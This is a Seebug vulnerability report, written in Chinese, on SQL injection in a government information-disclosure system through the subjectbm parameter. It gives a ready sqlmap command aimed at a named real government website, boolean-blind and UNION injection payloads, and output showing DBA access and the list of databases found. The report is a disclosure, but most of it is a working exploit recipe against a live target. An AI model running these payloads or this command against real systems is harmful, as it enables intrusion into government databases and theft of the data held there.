大汉版通政府信息公开系统SQL注射

2014-05-19T00:00:00
ID SSV:93847
Type seebug
Reporter Root
Modified 2014-05-19T00:00:00

Description

简要描述:

政府信息公开系统

详细说明:

政府信息公开系统 某处sql注射漏洞 注入点 zfxxgk/subjectinfo.jsp?subjectbm= subjectbm参数过滤不严,导致注入 政府网站案例

sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/subjectinfo.jsp?subjectbm=" --is-dba --dbs

payload

``` Place: GET Parameter: subjectbm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: subjectbm=%' AND 7860=7860 AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: subjectbm=-9666%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,CHAR(113)+CHAR(104)+CHAR(112)+CHAR(116)+CHAR(113)+CHAR(81)+CHAR(120)+CHA R(113)+CHAR(102)+CHAR(97)+CHAR(66)+CHAR(101)+CHAR(81)+CHAR(69)+CHAR(68)+CHAR(113 )+CHAR(98)+CHAR(100)+CHAR(119)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--


web application technology: JSP back-end DBMS: Microsoft SQL Server 2000 current user is DBA: True ```

管理员权限注射 列一下数据库

[*] gov [*] jcms [*] jcmsvc [*] jis [*] lm [*] mailbook [*] master [*] model [*] msdb [*] newlm [*] Northwind [*] pubs [*] sms [*] tempdb [*] vipchat [*] xxgk

漏洞证明:

证明截图

<img src="https://images.seebug.org/upload/201405/19092456cbafedc0b217ecd615cfc4fffd292bf9.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">